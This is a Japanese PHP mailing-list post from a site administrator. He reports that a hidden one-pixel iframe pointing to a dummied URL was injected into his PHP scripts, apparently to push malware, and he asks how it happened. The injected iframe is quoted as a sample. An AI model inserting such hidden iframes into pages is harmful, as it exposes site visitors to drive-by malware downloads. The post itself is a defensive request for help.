[PHP-users 32321] index.phpに対する、不正な書き換え

[nakahara Kosuke]

初めてMLに投稿します、ナカハラといいます。よろしくお願いします。

■先日、自分の管理していたサイトのPHPのスクリプトの一部に、以下のような
コードが勝手に挿入されてしまいました。

<iframe src='http://dummy/logo/index.php' width='1' height='1'
style='visibility: hidden;'></iframe>

リンク先のURLはダミーですが、ウイルスをダウンロードさせるためのリンク
のようです。

自分の書いているPHPのスクリプトに脆弱性があるのかと思うのですが、検討が
つきません。どなたかこのような事例について、ご存知ないでしょうか？

ご指導のほど、よろしくお願いいたします。

■環境

OS：CentOS 4.4
PHP：4.3.9/5.1.6 (いづれのバージョンでも起こりました）
registor_globalsは、offになっています。

-- 
Kosuke Nakahara <nakahara ＠ colormepop.net>